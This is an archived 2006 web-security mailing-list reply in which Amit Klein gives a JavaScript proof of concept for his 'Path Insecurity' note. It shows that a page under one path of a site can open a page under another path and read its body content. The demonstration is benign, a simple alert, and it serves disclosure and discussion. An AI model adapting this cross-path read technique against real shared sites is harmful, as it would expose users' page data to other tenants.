[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"

From: "Amit Klein (AKsecurity)" <aksecurity@xxxxxxxxxx>
Subject: Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
Date: Tue, 02 May 2006 20:13:51 +0200

On 2 May 2006 at 12:42, Brian Eaton wrote:

> Hi Amit -
> 
> On 3/1/06, Amit Klein (AKsecurity) <aksecurity@xxxxxxxxxx> wrote:
> > Hopefully this is obvious, but in order to focus the discussion,
> > it is first needed to observe that a window loaded with URL
> > http://www.some.site/bar/page1.html can be both fully read and
> > fully written by a window opened with
> > http://www.some.site/foo/attack1.html, by means of the latter
> > incorporating a Javacript code that obtains a handle H for the
> > Bar window, and then reads or assigns to
> > H.document.body.innerHTML. Likewise the document URL
> > (H.document.URL), the history collection of this window
> > (H.history - actually, the way to exploit this is to traverse the
> > history list via iterative application of the prev() and next()
> > operations, each time reading the URL via H.document.URL) and the
> > document referrer (H.document.referrer) can be accessed. It
> > should be very clear that this is a fundamental security issue,
> > enabling Foo to attack Bar and to fool Bar's user easily by
> > changing data/events in Bar's page and reading sensitive data off
> > the page.
> 
> I've spent the past day or two looking at javascript error messages
> without being able to get this to actually work.  Are you willing to
> share a proof-of-concept?
> 

/foo/attack.html:

<html>
<body>
<script>
H=window.open("/bar/page1.html");
setTimeout("alert(H.document.body.innerHTML)",3000);
</script>
</body>
</html>


/bar/page1.html:

<html>
<body>
hello world
</body>
</html>


Fire /foo/attack.html, it'll open /bar/page1.html, then after 3 seconds, it'll pop-up 
"hello world" (from the body of /bar/page1.html).

Hope this helps.
-Amit


---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/

Follow-Ups:
- Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
  - From: Brian Eaton

References:
- Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
  - From: Brian Eaton

Prev by Date: Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
Next by Date: Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
Previous by thread: Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
Next by thread: Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site